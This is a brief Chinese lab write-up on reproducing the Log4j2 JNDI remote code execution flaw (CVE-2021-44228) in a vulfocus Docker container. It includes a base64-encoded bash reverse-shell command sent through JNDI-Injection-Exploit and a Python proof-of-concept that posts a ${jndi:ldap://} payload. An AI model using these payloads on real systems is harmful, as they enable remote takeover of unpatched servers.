环境搭建:
使用docker拉取:
[root@www /]# docker pull vulfocus/log4j2-rce-2021-12-09
运行:
[root@www /]# docker run -P vulfocus/log4j2-rce-2021-12-09
查看端口:
[root@www ]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
4143c7d55448 vulfocus/log4j2-rce-2021-12-09 "java -jar /demo/dem…" 20 seconds ago Up 19 seconds 0.0.0.0:51832->8080/tcp, :::51832->8080/tcp happy_wescoff
环境启动后,POST方式访问http://your-ip:port即可看到页面。
漏洞复现:
反弹shell:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMzLjExLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}” -A “192.168.33.11”
根据自己的java版本,最好每个都多试几次,我用的java 1.8.0_202 。
工具地址:
https://github.com/welk1n/JNDI-Injection-Exploit
POC编写:
import requests,random,time
url = "http://192.168.33.172:51832/hello"
def poc():
try:
session = requests.session()
ret = session.get("http://www.dnslog.cn/getdomain.php?t=" + str(random.randint(100000, 999999)),
timeout=20).text
poc="${jndi:ldap://%s/}" %ret
data = {"payload": f"{poc}"}
requests.post(url,data)
time.sleep(5)
ret2 = session.get("http://www.dnslog.cn/getrecords.php?t=" + str(random.randint(100000, 999999)),
timeout=20).text
if ret in ret2:
print(f"{url} 存在Apache Log4j2远程代码执行漏洞 CVE-2021-44228")
except:
pass
poc()
运行结果: